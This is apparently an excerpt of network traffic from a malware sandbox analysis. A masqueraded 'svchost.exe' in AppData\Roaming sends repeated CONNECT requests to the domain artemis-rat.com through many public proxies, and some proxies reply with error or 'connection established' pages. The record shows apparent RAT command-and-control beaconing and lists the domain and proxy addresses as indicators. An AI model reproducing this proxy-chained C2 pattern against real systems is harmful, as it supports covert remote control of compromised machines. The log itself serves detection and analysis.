Mar 9, 2024 13:14:36.167315006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3437	192.168.2.5	60451	78.30.128.10	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.168982983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3438	192.168.2.5	60333	119.18.149.34	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.168983936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3439	192.168.2.5	56741	146.59.18.246	15860	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.169281960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3440	192.168.2.5	60924	61.178.152.31	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.184458971 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:36.540769100 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3441	192.168.2.5	60798	117.160.250.132	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.184467077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.887953997 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3442	192.168.2.5	60926	119.3.215.41	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.198445082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3443	192.168.2.5	60927	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.199044943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3444	192.168.2.5	56940	162.223.116.75	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.203464985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.760848045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474622965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3445	192.168.2.5	60931	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.205519915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3446	192.168.2.5	60922	42.49.148.167	9001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.229063034 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:36.669317961 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3447	192.168.2.5	60601	51.158.98.211	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.238651991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3448	192.168.2.5	60593	82.223.121.72	15464	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.261157036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3449	192.168.2.5	60943	185.101.16.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.299962044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3450	192.168.2.5	60952	185.217.136.67	1337	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.300858021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3451	192.168.2.5	56787	1.194.236.229	5005	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.315515995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117012024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.177655935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3452	192.168.2.5	60951	103.118.46.177	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.329541922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3453	192.168.2.5	56769	201.217.246.212	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.340559959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3454	192.168.2.5	60748	39.165.0.137	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.343671083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.645695925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.667567968 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3455	192.168.2.5	56885	103.121.39.158	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.363109112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3456	192.168.2.5	60615	107.180.95.177	7128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.401340008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3457	192.168.2.5	59923	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.401566982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3458	192.168.2.5	60925	111.59.4.88	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.401915073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.037731886 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3459	192.168.2.5	60972	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.415983915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3460	192.168.2.5	60740	184.178.172.25	15291	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.426789999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3461	192.168.2.5	60966	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.430185080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3462	192.168.2.5	59536	85.62.218.250	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.485761881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.851891041 CET	1254	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.28 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html;charset=utf-8 Content-Length: 952 X-Squid-Error: ERR_ACCESS_DENIED 0 Content-Language: en X-Cache: MISS from ah_test Via: 1.1 ah_test (squid/3.5.28) Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 33 36 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/">https://artemis-rat.com/</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:36 GMT</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3463	192.168.2.5	57011	103.113.170.230	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.529704094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3464	192.168.2.5	60617	115.74.157.191	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.538106918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3465	192.168.2.5	60985	18.167.191.223	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.573950052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.333347082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333789110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3466	192.168.2.5	59884	189.240.60.171	9090	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.575138092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.926775932 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3467	192.168.2.5	60957	45.138.87.238	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.575176954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3468	192.168.2.5	60971	111.90.150.109	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.575237036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3469	192.168.2.5	60975	38.54.16.97	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.575278997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.918128967 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
